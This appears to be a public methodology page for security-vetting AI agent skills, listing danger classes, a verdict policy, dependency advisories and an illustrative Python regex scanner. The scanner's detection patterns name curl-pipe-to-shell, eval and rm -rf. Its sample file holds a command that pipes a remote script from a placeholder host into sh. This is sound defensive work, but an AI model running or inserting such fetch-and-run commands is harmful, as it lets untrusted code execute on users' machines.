Security & vetting
What we check, and how the Shield is earned
The Shield is granted only to popular, high-quality skills that pass a deep security scan. Unlike a star count, the scan reads the actual code and dependencies. This page is the full, open methodology — every Shielded skill has been checked against everything below, and is re-checked on a schedule.
- Skills scanned: 40
- Shield-vetted: 29
- Advisories tracked: 57
- Last scan: 2026-05-26
How the scan works
1. Fetch the real code. We pull the skill's marker file, manifests, and source from its GitHub repository — not just the README.
2. Static analysis. Every file is scanned for the danger patterns listed below, and each finding is located to a file and line.
3. Dependency check. Manifests (package.json, requirements.txt, …) are parsed and every dependency is matched against the OSV vulnerability database (CVEs + GitHub Security Advisories).
4. AI safety review. A model reviews the code and the static findings for concerns that patterns miss — exfiltration, deceptive behaviour, malicious intent.
5. Verdict. The findings produce a verdict. The Shield is granted only on a clean pass.
Verdict policy
- Fail — any high- or critical-severity finding. The skill cannot earn the Shield.
- Warn — a medium-severity finding (e.g. a dependency advisory). The Shield is withheld and the finding is surfaced.
- Pass — only low/informational findings, or none. Combined with popularity, this earns the Shield.
Everything we check against
The exact danger classes the scan looks for, most severe first.
- Unpinned remote code execution (critical, code scan): fetching and running code from the internet at install or runtime (curl | sh, Invoke-Expression).
- Dynamic code evaluation (high, code scan): use of eval, exec, or Function() to execute strings as code.
- Destructive filesystem operations (high, code scan): recursive or broad deletes (rm -rf, shutil.rmtree, recursive fs.rm).
- Hardcoded secrets (high, code scan): API keys, tokens, or passwords committed into the source.
- Prompt injection (high, code scan): instructions that try to override the agent or exfiltrate the prompt, context, or secrets.
- Deceptive or malicious behaviour (high, AI review): code or instructions designed to deceive or harm the user, flagged by the AI safety review.
- Data exfiltration (medium, AI review): reading local files or environment variables and sending them to a remote host.
- Shell / process execution (medium, code scan): spawning shells or child processes (child_process, os.system, subprocess).
- Obfuscated code (medium, code scan): large base64/hex blobs or packed code that hides what the skill does.
- Credential prompts (medium, code scan): asking the user or agent to paste secrets, especially alongside outbound requests.
- Known dependency vulnerabilities (medium, dependency · OSV): a dependency with a published CVE / GitHub advisory, matched against the OSV database.
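As an added illustration (not the site's own scanner code), the Python below approximates the static-analysis step and the verdict policy described above: a small set of regex rules for the code-scan danger classes, each finding located to a file and line, and the fail/warn/pass rule applied to the worst finding. The regexes and the sample skill files are constructed for this example and are assumptions about what such rules look like, not the real rule set.

```python
import re
# Danger classes named on the vetting page, with the severity it assigns to each.
# The regexes are illustrative approximations written for this example, not the site's rules.
RULES = [
    ("Unpinned remote code execution", "critical",
     re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba)?sh\b|Invoke-Expression|\biex\b", re.I)),
    ("Dynamic code evaluation", "high",
     re.compile(r"\b(eval|exec)\s*\(|\bFunction\s*\(")),
    ("Destructive filesystem operations", "high",
     re.compile(r"\brm\s+-(?=[a-z]*r)(?=[a-z]*f)[a-z]+|\bshutil\.rmtree\s*\(|\bfs\.rm(Sync)?\([^)]*recursive:\s*true", re.I)),
    ("Hardcoded secrets", "high",
     re.compile(r"(api[_-]?key|token|password|secret)\s*[:=]\s*['\"][A-Za-z0-9_\-]{16,}['\"]", re.I)),
    ("Shell / process execution", "medium",
     re.compile(r"\bchild_process\b|\bos\.system\s*\(|\bsubprocess\.")),
    ("Obfuscated code", "medium",
     re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]")),
]
SEVERITY_RANK = {"critical": 3, "high": 2, "medium": 1, "low": 0, "informational": 0}

def scan_text(path, text):
    """Scan one file; each finding is (rule, severity, path, line_no), located as the page describes."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for name, severity, pattern in RULES:
            if pattern.search(line):
                findings.append((name, severity, path, line_no))
    return findings

def verdict(findings):
    """Apply the page's policy: any high/critical fails, a medium warns, low/none passes."""
    worst = max((SEVERITY_RANK[sev] for _, sev, _, _ in findings), default=0)
    return "fail" if worst >= 2 else "warn" if worst == 1 else "pass"

def scan_skill(files):
    """Scan a {path: contents} mapping and return (findings, verdict)."""
    findings = [f for path, text in files.items() for f in scan_text(path, text)]
    return findings, verdict(findings)

# Constructed sample skill, not taken from any real repository.
SAMPLE_FILES = {
    "install.sh": "#!/bin/sh\ncurl -fsSL https://example.invalid/setup.sh | sh\n",
    "tool.py": "import subprocess\nsubprocess.run(['ls'])\n",
    "README.md": "# Demo skill\nRun `npm install`, then call the tool.\n",
}
if __name__ == "__main__":
    found, result = scan_skill(SAMPLE_FILES)
    for name, severity, path, line_no in found:
        print(f"{severity:8} {path}:{line_no}  {name}")
    print("verdict:", result)  # fail: the install script pipes curl into sh
```

Real-world rules need context the regexes lack (a `curl | sh` inside a fenced README example versus an install script), which is why the page pairs the pattern scan with a model review rather than relying on either alone.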
Known vulnerabilities we've flagged
Advisories the scanner has matched to indexed skills via their dependencies, newest first.
| Advisory | Package | Severity | Skills |
|---|---|---|---|
| GHSA-9crc-q9x8-hgqq | vitest · npm | moderate | 4 |
| GHSA-xrxf-jgv3-qmrm | @openai/codex · npm | moderate | 2 |
| GHSA-w5fx-fh39-j5rw | @openai/codex · npm | moderate | 2 |
| GHSA-m95q-7qp3-xv42 | zod · npm | moderate | 4 |
| GHSA-x6fg-f45m-jf5q | semver · npm | moderate | 2 |
| GHSA-c2qf-rxjj-qqgw | semver · npm | moderate | 2 |
| MAL-2025-6023 | eslint-plugin-prettier · npm | moderate | 2 |
| GHSA-f29h-pxvx-f335 | eslint-plugin-prettier · npm | moderate | 2 |
| MAL-2025-6022 | eslint-config-prettier · npm | moderate | 2 |
| GHSA-f29h-pxvx-f335 | eslint-config-prettier · npm | moderate | 2 |
| GHSA-67mh-4wv8-2f99 | esbuild · npm | moderate | 2 |
| GHSA-hwj9-h5mp-3pm3 | postcss · npm | moderate | 1 |
| GHSA-7fh5-64p2-3v2j | postcss · npm | moderate | 1 |
| GHSA-566m-qj78-rww5 | postcss · npm | moderate | 1 |
| GHSA-f9xv-q969-pqx4 | yaml · npm | moderate | 2 |
| GHSA-48c2-rrv3-qjmp | yaml · npm | moderate | 2 |
| GHSA-qg8p-v9q4-gh34 | shell-quote · npm | moderate | 1 |
| GHSA-g4rg-993r-mgx7 | shell-quote · npm | moderate | 1 |
| GHSA-mvjj-gqq2-p4hw | react-dom · npm | moderate | 2 |
| GHSA-hg79-j56m-fxgv | react · npm | moderate | 2 |
| GHSA-g53w-52xc-2j85 | react · npm | moderate | 2 |
| GHSA-wc9v-mj63-m9g5 | pg · npm | moderate | 1 |
| GHSA-2w6w-674q-4c4q | handlebars · npm | moderate | 1 |
| GHSA-2qvq-rjwj-gvw9 | handlebars · npm | moderate | 1 |
| GHSA-2cf5-4w76-r9qv | handlebars · npm | moderate | 1 |
| GHSA-5j98-mcp5-4vw2 | glob · npm | moderate | 1 |
| GHSA-jj78-5fmv-mv28 | express · npm | moderate | 1 |
| GHSA-gpvr-g6gh-9mc2 | express · npm | moderate | 1 |
| GHSA-cm5g-3pgc-8rg4 | express · npm | moderate | 1 |
| GHSA-8hgg-xxm5-3873 | dompurify · npm | moderate | 1 |
| GHSA-63q7-h895-m982 | dompurify · npm | moderate | 1 |
| GHSA-39q2-94rc-95cp | dompurify · npm | moderate | 1 |
| GHSA-8jhw-6pjj-8723 | better-auth · npm | moderate | 1 |
| GHSA-569q-mpph-wgww | better-auth · npm | moderate | 1 |
| GHSA-36rg-gfq2-3h56 | better-auth · npm | moderate | 1 |
| GHSA-w48q-cv73-mx4w | @modelcontextprotocol/sdk · npm | moderate | 2 |
| GHSA-8r9q-7v3j-jr4g | @modelcontextprotocol/sdk · npm | moderate | 2 |
| GHSA-345p-7cg4-v4c7 | @modelcontextprotocol/sdk · npm | moderate | 2 |
| GHSA-c2gp-86p4-5935 | puppeteer · npm | moderate | 1 |
| GHSA-gp95-ppv5-3jc5 | sharp · npm | moderate | 1 |
| GHSA-54xq-cgqr-rpm3 | sharp · npm | moderate | 1 |
| MAL-2026-2853 | react-hook-form · npm | moderate | 1 |
| GHSA-8f24-v5vv-gm5j | next-intl · npm | moderate | 1 |
| GHSA-4c35-wcg5-mm9h | next-intl · npm | moderate | 1 |
| GHSA-f9wg-5f46-cjmw | next-auth · npm | moderate | 1 |
| GHSA-7r7x-4c4q-c4qf | next-auth · npm | moderate | 1 |
| GHSA-5jpx-9hw9-2fx4 | next-auth · npm | moderate | 1 |
| GHSA-267c-6grr-h53f | next · npm | moderate | 1 |
| GHSA-25mp-g6fv-mqxx | next · npm | moderate | 1 |
| GHSA-223j-4rm8-mrmf | next · npm | moderate | 1 |
Quality (maintenance, documentation, adoption) is scored separately — see the Skill Score methodology.